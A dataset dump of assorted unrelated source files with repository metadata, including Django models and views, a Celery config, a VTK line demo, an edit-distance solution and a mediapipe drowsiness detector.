def singleShot(self, *args, **kwargs): # real signature unknown
pass
def start(self, *args, **kwargs): # real signature unknown
pass
def startTimer(self, *args, **kwargs): # real signature unknown
pass
def stop(self, *args, **kwargs): # real signature unknown
pass
def timerEvent(self, *args, **kwargs): # real signature unknown
pass
def timerId(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *more): # real signature unknown; restored from __doc__
""" x.__init__(...) initializes x; see help(type(x)) for signature """
pass
staticMetaObject = None
timeout = None
__new__ = None
|
[
"[email protected]"
] | |
800613bb979e2a651e7833167d3b6536f748963a
|
699add6df73ad158b8ebeb5f9de4aada5820f205
|
/facebook/app/posts/models/comments.py
|
51bab010f0aef4c5c779bd1f65e15e568916fbfe
|
[] |
no_license
|
ricagome/Api-Facebook-Clone
|
4f035ad280e6cb48d375fd87a9f62eecce67eb51
|
fae5c0b2e388239e2e32a3fbf52aa7cfd48a7cbb
|
refs/heads/main
| 2023-08-17T12:34:33.379017 | 2021-10-05T21:23:32 | 2021-10-05T21:23:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 694 |
py
|
"""Comment model."""
# Django
from django.db import models
# Utilities
from app.utils.models import FbModel
class Comment(FbModel):
"""Comment model."""
user = models.ForeignKey('users.User', on_delete=models.CASCADE)
profile = models.ForeignKey('users.Profile', on_delete=models.CASCADE)
post = models.ForeignKey('posts.Post', on_delete=models.CASCADE)
text = models.TextField(help_text='write a comment', max_length=250)
reactions = models.IntegerField(default=0)
def __str__(self):
"""Return username, post title and comment."""
return '@{} has commented {} on {}'.format(
self.user.username,
self.text, self.post)
|
[
"[email protected]"
] | |
5483a62a0289eaf03b82b517c8e78dd11f7e8a9d
|
4a2f163e603f90d5b9a4b2a100d7bc7bc77d1c95
|
/predicting_biological_response/hemy_example.py
|
401b7f3d5dd2f883930c7bfdf5ca5cfa2b058519
|
[] |
no_license
|
tusonggao/data_cck
|
d781334bd1d425f6ecd613ebdb194835846e3adb
|
91d48589e8431fd00d70348dcb049c52fdcd2c7f
|
refs/heads/master
| 2020-04-09T03:59:09.931284 | 2020-01-26T15:54:14 | 2020-01-26T15:54:14 | 160,005,725 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 155 |
py
|
# https://blog.csdn.net/data_scientist/article/details/79036382
# https://blog.csdn.net/Gin077/article/details/84339790
# https://github.com/rushter/heamy
|
[
"[email protected]"
] | |
88e7be6d96ec8e784aba5e12b0692d4c5beb1949
|
2db7597686f33a0d700f7082e15fa41f830a45f0
|
/Python/LeetCode2.0/DP/72.Edit Distance.py
|
b071302d4d3bdf3daf32936c19f8404f75c65131
|
[] |
no_license
|
Leahxuliu/Data-Structure-And-Algorithm
|
04e0fc80cd3bb742348fd521a62bc2126879a70e
|
56047a5058c6a20b356ab20e52eacb425ad45762
|
refs/heads/master
| 2021-07-12T23:54:17.785533 | 2021-05-17T02:04:41 | 2021-05-17T02:04:41 | 246,514,421 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,595 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2020/05/09
'''
input: two words: str; the length of word is from 0 to inf
output: int; the number of modify steps
corner case:
one of the word is ‘’ → len(word2)
both words are ‘’ → 0
Method - DP
Steps:
build DP table; the size of table is (len(word1) + 1)* (len(word2) + 1)
dp[i][j]: the optimal solution when the size of word1 is i, the size of word2 is j
dp[i][j] = dp[i-1][j-1], word1[i - 1] != word2[j - 1]
= min(dp[i][j-1], dp[i-1][j],dp[i-1][j-1]) + 1, word1[i - 1] == word2[j - 1]
result is dp[len(word2)][len(word1)]
base case:
dp[0][j] = j
dp[i][0] = i
Time Complexity: O(NM), N is the length of word1 and M is the length of word2
Space Complexity: O(NM), DP table’s size
'''
# 易错点,注意哪个word是行,哪个word是列; word1[i - 1] != word2[j - 1], 减1不能忘
class Solution:
def minDistance(self, word1: str, word2: str) -> int:
m = len(word1)
n = len(word2)
if m == 0:
return n
if n == 0:
return m
dp = [[0] * (m + 1) for _ in range(n + 1)]
for i in range(n + 1):
for j in range(m + 1):
if i == 0:
dp[i][j] = j
elif j == 0:
dp[i][j] = i
elif word2[i - 1] == word1[j - 1]:
dp[i][j] = dp[i - 1][j - 1]
else:
dp[i][j] = min(dp[i][j - 1], dp[i - 1][j], dp[i - 1][j - 1]) + 1
return dp[n][m]
|
[
"[email protected]"
] | |
9aa84188689bfa3d627c30002874472a97dc229a
|
499ff5445e2017d042690c0429cf2e767a7f623f
|
/coral/io/_abi.py
|
b19a2ab0ec287ad6d000026ece9b71f749677f3a
|
[
"MIT"
] |
permissive
|
blthree/coral
|
b6ab934c10271d7b790130fe45e622b7c66921b4
|
30514735d9a51487583535a3a7e3fbfd0fe15ed8
|
refs/heads/master
| 2021-01-22T10:14:52.018579 | 2017-02-19T00:28:33 | 2017-02-19T00:28:33 | 81,997,699 | 0 | 0 | null | 2017-02-14T22:58:59 | 2017-02-14T22:58:59 | null |
UTF-8
|
Python
| false | false | 3,069 |
py
|
'''Read and write DNA sequences.'''
import coral as cr
import numpy as np
import os
from . import parsers
from .exceptions import UnsupportedFileError
def read_abi(path, trim=True, attach_trace=True):
'''Read a single ABI/AB1 Sanger sequencing file.
:param path: Full path to input file.
:type path: str
:param trim: Determines whether the sequence will be trimmed using Richard
Mott's algorithm (trims based on quality).
:type trim: bool
:param attach_trace: Determines whether to attach the trace result as a
.trace attribute of the returned sequence and the
trace peak locations as a .tracepeaks attribute. The
trace attribute is a 2D numpy array with 4 columns in
the order GATC.
:type attach_trace: bool
:returns: DNA sequence.
:rtype: coral.DNA
'''
filename, ext = os.path.splitext(os.path.split(path)[-1])
abi_exts = ['.abi', '.ab1']
if ext in abi_exts:
with open(path) as f:
abi = parsers.ABI(f)
else:
raise UnsupportedFileError('File format not recognized.')
seq = abi.seq_remove_ambig(abi.seq)
# Attach the trace results to the seq
if attach_trace:
order = abi.data['baseorder'].upper()
trace = [abi.data['raw' + str(order.index(b) + 1)] for b in 'GATC']
trace = np.array(trace)
tracepeaks = np.array(abi.data['tracepeaks'])
if trim:
try:
sequence = cr.DNA(abi.trim(seq))
except ValueError:
# A ValueError is raised if the sequence is too short
pass
trim_start = seq.index(str(sequence))
# Adjust trace data based on trimming
idx = (trim_start, trim_start + len(sequence))
peaks = tracepeaks[idx[0]:idx[1]]
sequence.trace = trace[peaks[0]:peaks[-1], :]
sequence.tracepeaks = peaks
else:
sequence = cr.DNA(seq)
sequence.name = abi.name
return sequence
def read_abis(directory, trim=True, attach_trace=True):
'''Read all ABI sequences files in a directory.
:param directory: Path to directory containing sequencing files.
:type directory: str
:param trim: Determines whether the sequence will be trimmed using Richard
Mott's algorithm (trims based on quality).
:type trim: bool
:param attach_trace: Determines whether to attach the trace result as a
.trace attribute of the returned sequence. The trace
attribute is a 2D numpy array with 4 columns in the
order GATC.
:type attach_trace: bool
:returns: A list of DNA sequences.
:rtype: coral.DNA list
'''
dirfiles = os.listdir(directory)
abis = []
for dirfile in dirfiles:
path = os.path.join(directory, dirfile)
try:
abis.append(read_abi(path, trim=trim, attach_trace=attach_trace))
except UnsupportedFileError:
pass
return abis
|
[
"[email protected]"
] | |
0d3b60023a60eed6ae0274a83fd1daecbd04b513
|
95749b75c446df3ce4aabb03d5aec90de793e207
|
/gemini/taskapp/celery.py
|
722f621c5679f886e12c4c93ba9692df4ba43474
|
[] |
no_license
|
Hawk94/gemini
|
8288a11499c4cc12c8c79641a51b5e99afe268c5
|
3a4d0b13488b8e9fbc40dc3cde338b61bc04b494
|
refs/heads/master
| 2020-06-24T11:37:22.204269 | 2017-07-12T20:33:21 | 2017-07-12T20:33:21 | 96,935,334 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,398 |
py
|
import os
from celery import Celery
from django.apps import apps, AppConfig
from django.conf import settings
if not settings.configured:
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local') # pragma: no cover
app = Celery('gemini')
class CeleryConfig(AppConfig):
name = 'gemini.taskapp'
verbose_name = 'Celery Config'
def ready(self):
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
installed_apps = [app_config.name for app_config in apps.get_app_configs()]
app.autodiscover_tasks(lambda: installed_apps, force=True)
if hasattr(settings, 'RAVEN_CONFIG'):
# Celery signal registration
from raven import Client as RavenClient
from raven.contrib.celery import register_signal as raven_register_signal
from raven.contrib.celery import register_logger_signal as raven_register_logger_signal
raven_client = RavenClient(dsn=settings.RAVEN_CONFIG['DSN'])
raven_register_logger_signal(raven_client)
raven_register_signal(raven_client)
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request)) # pragma: no cover
|
[
"[email protected]"
] | |
346dfc71b0db9a749e8ee1d65b7425c276ff9cb1
|
4577d8169613b1620d70e3c2f50b6f36e6c46993
|
/students/1797637/homework01/program03.py
|
1dea672b0e9890cc0e4a8907a314950ef5731495
|
[] |
no_license
|
Fondamenti18/fondamenti-di-programmazione
|
cbaf31810a17b5bd2afaa430c4bf85d05b597bf0
|
031ec9761acb1a425fcc4a18b07884b45154516b
|
refs/heads/master
| 2020-03-24T03:25:58.222060 | 2018-08-01T17:52:06 | 2018-08-01T17:52:06 | 142,419,241 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,579 |
py
|
def codifica(chiave, testo):
''' Viene codificato e restituito un testo, fornito il testo stesso e una chiave di codifica'''
codifica=codifica_chiave(chiave)
for indice,carattere in enumerate(testo):
if carattere in codifica.keys(): testo = testo[:indice]+ testo[indice:].replace(testo[indice],codifica[carattere],1)
return testo
def decodifica(chiave, testo):
''' Viene decodificato e restituito un testo, fornito il testo stesso e una chiave di codifica'''
decodifica=decodifica_chiave(chiave)
for indice,carattere in enumerate(testo):
if carattere in decodifica.keys(): testo = testo[:indice]+ testo[indice:].replace(testo[indice],decodifica[carattere],1)
return testo
def codifica_chiave(chiave):
chiave=processa_chiave(chiave)
chiave_ord=''.join(sorted(chiave))
codifica={}
for indice,carattere in enumerate(chiave_ord): codifica[carattere]=chiave[indice]
return codifica
def decodifica_chiave(chiave):
chiave=processa_chiave(chiave)
chiave_ord=''.join(sorted(chiave))
decodifica={}
for indice,carattere in enumerate(chiave): decodifica[carattere]=chiave_ord[indice]
return decodifica
def processa_chiave(chiave):
for carattere in chiave:
if ord(carattere)<ord('a') or ord(carattere)>ord('z'): chiave= chiave.replace(carattere,'')
chiave=elimina_copie(chiave)
return chiave
def elimina_copie(chiave):
for carattere in chiave:
if carattere in chiave[chiave.find(carattere)+1:]: chiave= chiave.replace(carattere,'',1)
return chiave
|
[
"[email protected]"
] | |
8ccd44a76e64b8cc0ad921f213460c409e895266
|
cc7b4e71b3c27240ec650a75cc6f6bbab5e11387
|
/crdb/templatetags/email_tags.py
|
b13eedd6c32b7950e6ee3313c89e155c42547e14
|
[
"MIT"
] |
permissive
|
jsayles/CoworkingDB
|
0cdada869d950a28cfef20d1b9c1eb3eb4d7b1c2
|
78776910eba0354a7fd96b2e2c53a78e934d8673
|
refs/heads/master
| 2023-02-22T23:11:19.040799 | 2021-12-28T19:13:39 | 2021-12-28T19:13:39 | 883,951 | 3 | 0 |
MIT
| 2023-02-15T17:59:10 | 2010-09-02T18:36:43 |
Python
|
UTF-8
|
Python
| false | false | 764 |
py
|
import os
from django.template import Library
from django import template
from django.conf import settings
from django.utils.html import format_html
from django.urls import reverse
from crdb.models import EmailAddress
register = template.Library()
@register.simple_tag
def email_verified(email):
if not email:
return None
if not isinstance(email, EmailAddress):
# Got a string so we should pull the object from the database
email = EmailAddress.objects.get(email=email)
if email.is_verified():
return ""
html = '<span style="color:red;">( <a target="_top" style="color:red;" href="{}">{}</a> )</span>'
link = email.get_send_verif_link()
label = "Not Verified"
return format_html(html, link, label)
|
[
"[email protected]"
] | |
e8b2f8c81f953e4c0e4a8d266dceb71804203e01
|
7f25740b1ef47edc24db1a3618b399959b073fe1
|
/1029_17_smallproject.py
|
97673d239a34ef5759856f9eeba050bcf1977446
|
[] |
no_license
|
pjh9362/PyProject
|
b2d0aa5f8cfbf2abbd16232f2b55859be50446dc
|
076d31e0055999c1f60767a9d60e122fb1fc913e
|
refs/heads/main
| 2023-01-09T12:12:06.913295 | 2020-11-07T15:32:03 | 2020-11-07T15:32:03 | 306,814,117 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 198 |
py
|
cost = int(input())
cpn = input()
if cpn == "Cash3000":
print(cost-3000)
elif cpn == "Cash5000":
print(cost-5000)
else:
print("쿠폰이 적용되지 않았습니다.")
print(cost)
|
[
"[email protected]"
] | |
385836ada1f0c7aa8919ec7aeb97acca6aea94c0
|
644b13f90d43e9eb2fae0d2dc580c7484b4c931b
|
/network2.py
|
5dbc8833c5526d15e355e3169680c46c4a5bc280
|
[] |
no_license
|
yeonnseok/ps-algorithm
|
c79a41f132c8016655719f74e9e224c0870a8f75
|
fc9d52b42385916344bdd923a7eb3839a3233f18
|
refs/heads/master
| 2020-07-09T11:53:55.786001 | 2020-01-26T02:27:09 | 2020-01-26T02:27:09 | 203,962,358 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,318 |
py
|
def cal_ans():
temp = []
ans = 0
for i in range(len(src)):
if src[i] == 0:
if len(temp) == 5:
temp = temp[1:]
temp.append(i)
else:
ans += i * len(temp) - sum(temp)
for j in temp:
link[i + 1].append(j + 1)
link[j + 1].append(i + 1)
return ans
def cal_group():
cnt, group = 0, 0
zero_one = False
start, end = -1, 0
for i in range(len(src)):
start = i + 1
if src[i] == 1:
group += 1
else:
break
for i in range(len(src) - 1, -1, -1):
end = i + 1
if src[i] == 0:
group += 1
else:
break
for i in range(start, end):
if src[i] == 0:
cnt += 1
elif src[i] == 1:
if cnt >= 5:
group += (cnt - 4)
elif i >= 1 and src[i-1] == 0:
zero_one = True
cnt = 0
if zero_one and len(src) != 1:
return group + 1
return group
num_of_case = int(input())
for case in range(1, num_of_case + 1):
n = int(input())
src = list(map(int, input().split()))
link = [[] for _ in range(n + 1)]
print("#%d" % case, end=" ")
print(cal_ans(), end=" ")
print(cal_group())
|
[
"[email protected]"
] | |
ab0b8196c759f436a72d4ad731e16756cc9d4511
|
699cf40f6326b954a40b78e87317a62401bd4c2c
|
/.history/Drowsy_Detection_20210728124624.py
|
935884724404299f8e03c238ed4ff5289a4858c5
|
[] |
no_license
|
KhanhNguyen1308/Python-mediapippe
|
e3927f9c0c6499d8a3ba50a675617b89197dce89
|
981412efd39bd29c34a66afbec88abdabcb47ab9
|
refs/heads/main
| 2023-06-25T18:37:43.234063 | 2021-07-29T11:35:31 | 2021-07-29T11:35:31 | 368,535,068 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,727 |
py
|
import cv2
import time
import numpy as np
import mediapipe as mp
import tensorflow as tf
from threading import Thread
from head_pose_ratio import head_pose_ratio
from function import draw_point, eye_avg_ratio, put_text
from Angle_head_pose_ratio import head_pose_status, eye_stat
from mode import sleep_mode
interpreter = tf.lite.Interpreter('model.tflite')
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
cap = cv2.VideoCapture('Video/test_1406.mp4')
# cap = cv2.VideoCapture(0)
pTime = 0
time_active = 0
m = 0
status = ''
mpDraw = mp.solutions.drawing_utils
mpFaceMesh = mp.solutions.face_mesh
faceMesh = mpFaceMesh.FaceMesh()
drawSpec = mpDraw.DrawingSpec(thickness=1, circle_radius=2)
eye_status = ''
x_status = ''
y_status = ''
z_status = ''
head_status = ''
Drowsy_mode = ''
draw = False
t = 0
ear = 0
start_time = time.time()
count = 0
blink = 0
blink_perM = 0
pre_blink = 0
while True:
ret, img = cap.read()
ih, iw = img.shape[0], img.shape[1]
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
results = faceMesh.process(imgRGB)
if results:
face = []
Mount = []
Left_eye = []
Right_eye = []
try:
for face_lms in results.multi_face_landmarks:
for lm in face_lms.landmark:
x, y = int(lm.x * iw), int(lm.y * ih)
face.append([x, y])
nose = face[5]
Left_eye.append([face[249], face[374], face[380], face[382], face[385], face[386]])
Right_eye.append([face[7], face[145], face[153], face[155], face[158], face[159]])
Mount.append([face[308], face[317], face[14], face[87], face[61], face[82], face[13], face[312]])
img = draw_point(img, nose, Left_eye, Right_eye, Mount)
ear = eye_avg_ratio(Left_eye, Right_eye)
x1, x2, x3, x4, x5, x6 = head_pose_ratio(nose, Left_eye, Right_eye)
input_shape = input_details[0]['shape']
input_data = np.array((x1, x2, x3, x4, x5, x6), dtype=np.float32)
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
img = cv2.putText(img, str(x5), (nose[0] - 20, nose[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
img = cv2.putText(img, str(x6), (nose[0] + 20, nose[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
head_status, mode = head_pose_status(x5, x6, x2)
eye_status, blink, count = eye_stat(ear, count, blink, mode)
if mode == 1:
print(round(ear, 3))
Drowsy_mode = sleep_mode(mode, ear, blink)
m += 1
except:
eye_status = 'None Face'
x_status = 'None Face'
y_status = 'None Face'
cTime = time.time()
fps = int(1 / (cTime - pTime))
pTime = cTime
img = cv2.putText(img, str(m), (10, 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 1)
text_fps = 'FPS:' + str(fps)
text_EaR = 'Eye_avg_Ratio: ' + str(round(ear, 2))
text_Head_pose = 'Head_pose: ' + head_status
text_ES = 'Eye_Status: ' + eye_status
text_blink = 'Blink_Num: ' + str(blink)
text_blink_avg = 'Blink_AVG: ' + str(blink_perM)
img = put_text(img, text_fps, text_EaR, text_ES, text_blink, text_blink_avg, text_Head_pose)
cv2.imshow('results', img)
if (time.time() - start_time) > 60:
start_time = time.time()
time_active += 1
blink_perM = blink
pre_blink = blink
blink = 0
key = cv2.waitKey(1)
# if m == 900:
# break
if key == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
181d7604566e31eea4b774b2ae9b3356926009e6
|
a40950330ea44c2721f35aeeab8f3a0a11846b68
|
/VTK/Actors/ThreeLine.py
|
e780418bfccbe2f4be8ca077eaf8f0c68c4225b5
|
[] |
no_license
|
huang443765159/kai
|
7726bcad4e204629edb453aeabcc97242af7132b
|
0d66ae4da5a6973e24e1e512fd0df32335e710c5
|
refs/heads/master
| 2023-03-06T23:13:59.600011 | 2023-03-04T06:14:12 | 2023-03-04T06:14:12 | 233,500,005 | 3 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,218 |
py
|
import vtk
# Visualize
colors = vtk.vtkNamedColors()
# Create points
p0 = [0.0, 0.0, 0.0]
p1 = [1.0, 0.0, 0.0]
p2 = [1.0, 1.0, 0.0]
p3 = [0.0, 1.0, 0.0]
p4 = [2.0, 0.0, 0.0]
p5 = [2.0, 1.0, 0.0]
# LineSource: draw a line with two points
def createLine1():
lineSource = vtk.vtkLineSource()
lineSource.SetPoint1(p1)
lineSource.SetPoint2(p2)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(lineSource.GetOutputPort())
return mapper
# LineSource Multi-point continuous straight line
def createLine2():
lineSource = vtk.vtkLineSource()
points = vtk.vtkPoints()
points.InsertNextPoint(p0)
points.InsertNextPoint(p1)
points.InsertNextPoint(p2)
points.InsertNextPoint(p3)
lineSource.SetPoints(points)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(lineSource.GetOutputPort())
return mapper
# LineSource multi-point set geometry + topology
def createLine3(): # 多条线添加 一个points_actor添加多条线段
# Create a vtkPoints object and store the points in it
points = vtk.vtkPoints()
points.InsertNextPoint(p0)
points.InsertNextPoint(p1)
points.InsertNextPoint(p2)
points.InsertNextPoint(p3)
points.InsertNextPoint(p4)
points.InsertNextPoint(p5)
# Create a cell array to store the lines in and add the lines to it
lines = vtk.vtkCellArray()
# for i in range(0, 5, 2):
# line = vtk.vtkLine()
# line.GetPointIds().SetId(0, i)
# line.GetPointIds().SetId(1, i + 1)
# lines.InsertNextCell(line)
line = vtk.vtkLine() # 默认为2个端点,
# print(line.GetPointIds())
# line.GetPointIds().SetNumberOfIds(4) # 可以设置为N个端点
line.GetPointIds().SetId(0, 0) # SetId第一个参数为端点ID, 第二个参数为点的ID
line.GetPointIds().SetId(1, 1)
lines.InsertNextCell(line)
line.GetPointIds().SetId(0, 1)
line.GetPointIds().SetId(1, 4)
# line.GetPointIds().SetId(2, 4)
lines.InsertNextCell(line)
# Create a polydata to store everything in
linesPolyData = vtk.vtkPolyData()
# Add the points to the dataset geometry
linesPolyData.SetPoints(points)
# Add the lines to the dataset topology
linesPolyData.SetLines(lines)
# Setup actor and mapper
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputData(linesPolyData)
return mapper
def main():
renderer = vtk.vtkRenderer()
renderWindow = vtk.vtkRenderWindow()
renderWindow.SetWindowName("Line")
renderWindow.AddRenderer(renderer)
renderWindowInteractor = vtk.vtkRenderWindowInteractor()
renderWindowInteractor.SetRenderWindow(renderWindow)
# Visualize
colors = vtk.vtkNamedColors()
renderer.SetBackground(colors.GetColor3d("Silver"))
actor = vtk.vtkActor()
# The first way
# actor.SetMapper(createLine1())
# The second way
# actor.SetMapper(createLine2())
# The third way
actor.SetMapper(createLine3())
actor.GetProperty().SetLineWidth(4)
actor.GetProperty().SetColor(colors.GetColor3d("Peacock"))
renderer.AddActor(actor)
renderWindow.Render()
renderWindowInteractor.Start()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
18eaf4480da5398f037854fd148de9adc33abbe1
|
d8940b6d45c15a84c8ee1ab298c4df8a905f956c
|
/pysnooper/__init__.py
|
4b6ea5bc1ee65f9e361836555c20c181a5e8e0ff
|
[
"MIT"
] |
permissive
|
Karanxa/PySnooper
|
f179c3e23627979c3a58664b966c9ae4cfa522a2
|
22f63ae09bb6d63de86496d613815ee03d191b75
|
refs/heads/master
| 2023-05-27T14:23:00.604201 | 2021-06-11T15:06:55 | 2021-06-11T15:06:55 | 376,061,317 | 1 | 0 |
MIT
| 2021-06-11T15:06:55 | 2021-06-11T15:04:02 | null |
UTF-8
|
Python
| false | false | 812 |
py
|
# Copyright 2019 Ram Rachum and collaborators.
# This program is distributed under the MIT license.
'''
PySnooper - Never use print for debugging again
Usage:
import pysnooper
@pysnooper.snoop()
def your_function(x):
...
A log will be written to stderr showing the lines executed and variables
changed in the decorated function.
For more information, see https://github.com/cool-RR/PySnooper
'''
from .tracer import Tracer as snoop
from .variables import Attrs, Exploding, Indices, Keys
import collections
__VersionInfo = collections.namedtuple('VersionInfo',
('major', 'minor', 'micro'))
__version__ = '0.5.0'
__version_info__ = __VersionInfo(*(map(int, __version__.split('.'))))
del collections, __VersionInfo # Avoid polluting the namespace
|
[
"[email protected]"
] | |
6017f8bc5e80a39ea78cc67cbc7474a53ad39874
|
4d259f441632f5c45b94e8d816fc31a4f022af3c
|
/tornado/mongodb/client.py
|
df52fa27df3ea41b18e3d682e2bcf182a9f48e30
|
[] |
no_license
|
xiaoruiguo/lab
|
c37224fd4eb604aa2b39fe18ba64e93b7159a1eb
|
ec99f51b498244c414b025d7dae91fdad2f8ef46
|
refs/heads/master
| 2020-05-25T01:37:42.070770 | 2016-05-16T23:24:26 | 2016-05-16T23:24:26 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,204 |
py
|
import httplib2
from urllib import urlencode
h = httplib2.Http()
## Add articles
data = {'id':'1', 'author':'B', 'genre':'comedy'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
data = {'id':'1', 'author':'C', 'genre':'comedys'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
data = {'id':'2', 'author':'A', 'genre':'tragedy'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
data = {'id':'3', 'author':'X', 'genre':'tragedy'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
## View all articles
content, response = h.request("http://127.0.0.1:8888/articles", "GET")
print '------- all articles -------'
print response
## View articles
print '------- per articles -------'
data = {"articleid":1}
data = urlencode(data)
content, response = h.request("http://127.0.0.1:8888/articles"+ "?" + data, "GET")
#for res in response:
# print res
print response
## Delete articles
#content, response = h.request("http://127.0.0.1:8888/articles", "DELETE")
#content, response = h.request("http://127.0.0.1:8888/articles", "GET")
#print response
|
[
"[email protected]"
] | |
3a0f200b06d77ef08f908fd0474fe8e95f74cb21
|
b68fea9d645de59ee31da970d3dc435460fde9de
|
/discussboard/views_edit.py
|
a7cc8324343a334ab42398e43c09249b9d270868
|
[
"BSD-3-Clause"
] |
permissive
|
shagun30/djambala-2
|
03fde4d1a5b2a17fce1b44f63a489c30d0d9c028
|
06f14e3dd237d7ebf535c62172cfe238c3934f4d
|
refs/heads/master
| 2021-01-10T04:20:30.735479 | 2008-05-22T05:02:08 | 2008-05-22T05:02:08 | 54,959,603 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,026 |
py
|
# -*- coding: utf-8 -*-
"""
/dms/discussboard/views_edit.py
.. enthaelt den View zum Aendern der Eigenschaften des Diskussionsforums
Django content Management System
Hans Rauch
[email protected]
Die Programme des dms-Systems koennen frei genutzt und den spezifischen
Beduerfnissen entsprechend angepasst werden.
0.02 21.05.2008 get_role_choices
0.01 12.07.2007 Beginn der Arbeit
"""
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django import newforms as forms
from django.db import transaction
from django.utils.translation import ugettext as _
from dms.queries import get_site_url
from dms.roles import *
from dms.utils import get_tabbed_form
from dms.utils import info_slot_to_header
from dms.utils import get_parent_section_choices
from dms.utils import remove_link_icons
from dms.utils import get_choices_new_protected
from dms.utils_form import get_folderish_vars_edit
from dms.encode_decode import decode_html
from dms.discussboard.utils import get_dont
from dms.discussboard.help_form import help_form
from dms_ext.extension import * # dms-Funktionen ueberschreiben
# -----------------------------------------------------
@require_permission('perm_edit_folderish')
def discussboard_edit(request, item_container):
""" Eigenschaften des Ordners aendern """
params = request.GET.copy()
profi_mode = params.has_key('profi')
@transaction.commit_manually
def save_values(item_container, old, new):
""" Abspeichern der geaenderten Werte """
item_container.container.save_values(old, new)
item_container.item.save_values(old, new)
item_container.save_modified_values(old, new)
transaction.commit()
class dms_itemForm ( forms.Form ) :
title = forms.CharField(max_length=240,
widget=forms.TextInput(attrs={'size':60}) )
nav_title = forms.CharField(max_length=60,
widget=forms.TextInput(attrs={'size':30}) )
sub_title = forms.CharField(required=False, max_length=240,
widget=forms.TextInput(attrs={'size':60}) )
text = forms.CharField(required=False,
widget=forms.Textarea(attrs={'rows':5, 'cols':60, 'id':'ta',
'style':'width:100%;'}) )
text_more = forms.CharField(required=False,
widget=forms.Textarea(attrs={'rows':10, 'cols':60, 'id':'ta1',
'style':'width:100%;'}) )
image_url = forms.CharField(required=False, max_length=200,
widget=forms.TextInput(attrs={'size':60}) )
image_url_url = forms.URLField(required=False, max_length=200,
widget=forms.TextInput(attrs={'size':60}) )
image_extern = forms.BooleanField(required=False)
is_wide = forms.BooleanField(required=False)
is_important = forms.BooleanField(required=False)
if profi_mode:
info_slot_right= forms.CharField(required=False, widget=forms.Textarea(
attrs={'rows':10, 'cols':60, 'style':'width:100%;'}) )
else:
info_slot_right= forms.CharField(required=False, widget=forms.Textarea(
attrs={'rows':10, 'cols':60, 'id':'ta2', 'style':'width:100%;'}) )
section = forms.CharField(required=False,
widget=forms.Select(choices=get_parent_section_choices(item_container),
attrs={'size':4, 'style':'width:40%'} ) )
has_user_support = forms.BooleanField(required=False)
has_comments = forms.BooleanField(required=False)
is_moderated = forms.BooleanField(required=False)
is_browseable = forms.BooleanField(required=False)
visible_start = forms.DateField(input_formats=['%d.%m.%Y'],
widget=forms.TextInput(attrs={'size':10}))
visible_end = forms.DateField(input_formats=['%d.%m.%Y'],
widget=forms.TextInput(attrs={'size':10}))
show_next = forms.BooleanField(required=False)
integer_4 = forms.ChoiceField(choices=get_choices_new_protected(), widget=forms.RadioSelect() )
app_name = 'discussboard'
my_title = _(u'Diskussionsforum ändern')
data_init = {
'title' : decode_html(item_container.item.title),
'nav_title' : decode_html(item_container.container.nav_title),
'sub_title' : item_container.item.sub_title,
'text' : remove_link_icons(item_container.item.text),
'text_more' : remove_link_icons(item_container.item.text_more),
'image_url' : item_container.item.image_url,
'image_url_url' : item_container.item.image_url_url,
'image_extern' : item_container.item.image_extern,
'is_wide' : item_container.item.is_wide,
'is_important' : item_container.item.is_important,
'info_slot_right' : info_slot_to_header(item_container.item.info_slot_right),
'section' : decode_html(item_container.section),
'has_comments' : item_container.item.has_comments,
'has_user_support': item_container.item.has_user_support,
'is_moderated' : item_container.item.is_moderated,
'is_browseable' : item_container.is_browseable,
'visible_start' : item_container.visible_start,
'visible_end' : item_container.visible_end,
'integer_4' : item_container.item.integer_4
}
if request.method == 'POST' :
data = request.POST.copy ()
else :
data = data_init
f = dms_itemForm ( data )
# --- Reihenfolge, Ueberschriften, Hilfetexte // Sonderfall: Startseite
tabs = [
('tab_base' , ['title', 'sub_title', 'nav_title', 'section', ]),
('tab_intro' , ['text', 'text_more', 'image_url', 'image_url_url', 'image_extern',
'is_wide', 'is_important']),
('tab_user_support', ['has_user_support', 'integer_4', 'is_moderated', 'has_comments']),
('tab_frame' , ['info_slot_right',]),
('tab_visibility', ['is_browseable', 'visible_start', 'visible_end',]),
]
content = get_tabbed_form(tabs, help_form, app_name ,f)
if request.method == 'POST' and not f.errors :
save_values(item_container, data_init, f.data)
